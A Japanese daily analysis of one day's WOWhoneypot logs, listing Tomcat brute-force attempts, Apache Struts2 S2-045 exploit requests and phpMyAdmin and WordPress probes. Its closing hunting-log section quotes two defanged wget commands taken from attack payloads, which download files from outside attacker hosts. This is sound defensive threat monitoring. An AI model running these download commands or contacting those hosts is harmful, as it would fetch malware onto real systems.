ハニーポットのログ分析(2018/10/20)
WOWhoneypotの2018/10/20(運用137日目)の簡易分析です。
本日の総アクセス件数は 2078件です。
主なアクセスは以下です。
・Tomcat管理ページへのブルートフォース攻撃:2002件
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:32件
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 2002 | 2018-10-20 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 32 | 2018-10-20 | アクセス | GET / |
| 21 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 2 | 2018-10-20 | 調査 | HEAD / |
| 1 | 2018-10-20 | WordPressの調査 | GET /wp-login.php |
| 1 | 2018-10-20 | 脆弱性スキャンツールZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | 2018-10-20 | クローリング | GET /robots.txt |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /register.jsp |
| 1 | 2018-10-20 | phpMyAdminの調査 | GET /pmd |
| 1 | 2018-10-20 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
| 1 | 2018-10-20 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | 2018-10-20 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
| 1 | 2018-10-20 | phpMyAdminの調査 | GET /phpmyadmin |
| 1 | 2018-10-20 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
| 1 | 2018-10-20 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /main.jsp |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /login/login.jsp |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /login.jsp |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /login/indexAction.action |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /login.do |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /login.action |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.jsp |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.do |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /indexAction.action |
| 1 | 2018-10-20 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /default.jsp |
本日のドメイン名でのアクセスは以下です。
9/4のドメイン取得後初めて、robots.txt以外の意図ある攻撃を観測できました。
2 GET /
1 GET /wp-login.php
1 GET /robots.txt
本日のハンティングログは以下です。Struts2の脆弱性を突く攻撃で観測したものです。
5 2018-10-20 wget -c hxxp://wap.tfddos[.]net:57843/linux
5 2018-10-20 wget -c hxxp://123.249.88[.]147:2222/s2.6l
以上です。
